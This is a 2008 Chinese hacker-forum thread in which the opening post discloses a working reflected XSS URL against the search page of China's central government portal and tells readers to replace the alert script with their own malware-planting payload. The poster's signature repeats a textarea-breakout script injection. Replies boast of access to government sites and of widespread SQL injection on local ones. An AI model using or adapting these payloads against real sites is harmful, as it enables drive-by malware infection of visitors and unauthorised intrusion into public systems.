黑客X档案官方论坛 » 毒木成林 » 中华人民共和国中央人民政府门户网站,的XSS出的真没水准.

12 12 ››

打印

[原创] 中华人民共和国中央人民政府门户网站,的XSS出的真没水准.

背时鬼

"></script><&

三年级

Rank: 3 Rank: 3 Rank: 3

帖子: 736
精华: 1
威望: 279 度
金币: 1509 枚
来自: 云南省昆明市中心
最后登录: 2008-12-2

发短消息
加为好友
当前离线

1^# 大中小发表于 2008-9-19 03:48 只看该作者

中华人民共和国中央人民政府门户网站,的XSS出的真没水准.

直到今天我终于明白为什么中国站点的XSS这么多.原来是有中华人民共和国中央人民政府门户网站这样的大站作带头人啊!郁闷

XSS测试代码:
http://sousuo.gov.cn/topsortsearch?searchword=SEARCHVALUE%3D%24%5E%7E123%24%5E%7E&prepage=10&keyword="><script>alert('XSS')</script><"&channelid=3001&submit=%E6%90%9C%E7%B4%A2
挂马的话自己替换掉<script>alert('XSS')</script> 就行.谢谢

[img][/img]</textarea><Script>alert('text')< /Script><textarea>[img][/img]

TOP

背时鬼

"></script><&

三年级

Rank: 3 Rank: 3 Rank: 3

帖子: 736
精华: 1
威望: 279 度
金币: 1509 枚
来自: 云南省昆明市中心
最后登录: 2008-12-2

发短消息
加为好友
当前离线

2^# 大中小发表于 2008-9-19 03:48 只看该作者

我不想说什么,只是有些

无言

[img][/img]</textarea><Script>alert('text')< /Script><textarea>[img][/img]

TOP

每当你参与一份调查,就可以获得1-10美元不等的调查佣金.

夜虫儿

虫虫

正式版主

Rank: 9 Rank: 9 Rank: 9

虫儿飞

帖子: 1971
精华: 1
威望: 152 度
金币: 5207 枚
性别: 男
来自: 中国矿业大学
最后登录: 2008-12-2

发短消息
加为好友
当前离线

3^# 大中小发表于 2008-9-19 10:05 只看该作者

汗！

入侵·破解·Linux
·非技术性话题不要跟我讨论！
·百度上已有的问题不要问我！
·莫问世间冷暖，心中自由无数乾坤倒转！
·我就像黑夜里的一只飞蛾，明知前方是火，却仍义无反顾……
·路过的到我小窝里面歇歇吧……

TOP

baishixinhou

一年级

Rank: 1

帖子: 93
精华: 0
威望: 8 度
金币: 263 枚
最后登录: 2008-11-23

发短消息
加为好友
当前离线

4^# 大中小发表于 2008-9-19 10:08 只看该作者

呵呵，强人！

TOP

每当你参与一份调查,就可以获得1-10美元不等的调查佣金.

背时鬼

"></script><&

三年级

Rank: 3 Rank: 3 Rank: 3

帖子: 736
精华: 1
威望: 279 度
金币: 1509 枚
来自: 云南省昆明市中心
最后登录: 2008-12-2

发短消息
加为好友
当前离线

5^# 大中小发表于 2008-9-19 20:02 只看该作者

这XSS出的shi ~

[img][/img]</textarea><Script>alert('text')< /Script><textarea>[img][/img]

TOP

bk7477890

XIAOYY

正式版主

Rank: 9 Rank: 9 Rank: 9

黑客X档案官方论坛

帖子: 4542
精华: 1
威望: 106 度
金币: 9712 枚
性别: 男
来自: 西安
最后登录: 2008-12-2

发短消息
加为好友
当前离线

6^# 大中小发表于 2008-9-19 20:05 只看该作者

政府网站，不能明目张胆的加分了，强悍~~·

TOP

每当你参与一份调查,就可以获得1-10美元不等的调查佣金.

_Faust

四年级

Rank: 4

帖子: 1280
精华: 0
威望: 12 度
金币: 2120 枚
最后登录: 2008-12-3

发短消息
加为好友
当前在线

7^# 大中小发表于 2008-9-19 23:26 只看该作者

嘿嘿，我的一个朋友因为入侵政府站点今天被请去喝茶了，至今下落不明。

楼主小心啊~~~

TOP

vscos

四年级

Rank: 4

帖子: 1395
精华: 0
威望: 6 度
金币: 2670 枚
最后登录: 2008-12-3

发短消息
加为好友
当前在线

8^# 大中小发表于 2008-9-20 10:00 只看该作者

政府网站也是普通网站，没什么区别。我现在就有好几个政府的网站。也没能找到敏感信息呀！

TOP

每当你参与一份调查,就可以获得1-10美元不等的调查佣金.

背时鬼

"></script><&

三年级

Rank: 3 Rank: 3 Rank: 3

帖子: 736
精华: 1
威望: 279 度
金币: 1509 枚
来自: 云南省昆明市中心
最后登录: 2008-12-2

发短消息
加为好友
当前离线

9^# 大中小发表于 2008-9-20 13:14 只看该作者

因为这个XSS适合大家初学XSS基础的朋友学习，我就发了~我还是第一回能一晚上发现4个XSS呢。XSS的利用还不大会，多少感觉学着很难啊~高级XSS我看过，就是靠看代码挖的~我呢大多是看IE地址来找下手的地方。不过说起来，我们这的*局站点SQL注入一大堆，垃圾的打紧啊。SQL在中国还得再火5 6年吧~做事不认真是很多人出问题的原因吧。

[img][/img]</textarea><Script>alert('text')< /Script><textarea>[img][/img]

TOP

祖破天

夜雨星光

三年级

Rank: 3 Rank: 3 Rank: 3

帖子: 666
精华: 0
威望: 35 度
金币: 1618 枚
来自: YYh小队
最后登录: 2008-12-3

发短消息
加为好友
当前在线

10^# 大中小发表于 2008-9-20 13:17 只看该作者

额，汗

绚烂之极归于平淡
万法自然，唯快不破
物极必转，黑的极至是为白
夜，尤其注重你的身体

TOP

每当你参与一份调查,就可以获得1-10美元不等的调查佣金.

‹‹ 上一主题 | 下一主题 ››

12 12 ››

Processed in 0.055330 second(s), 5 queries, Gzip enabled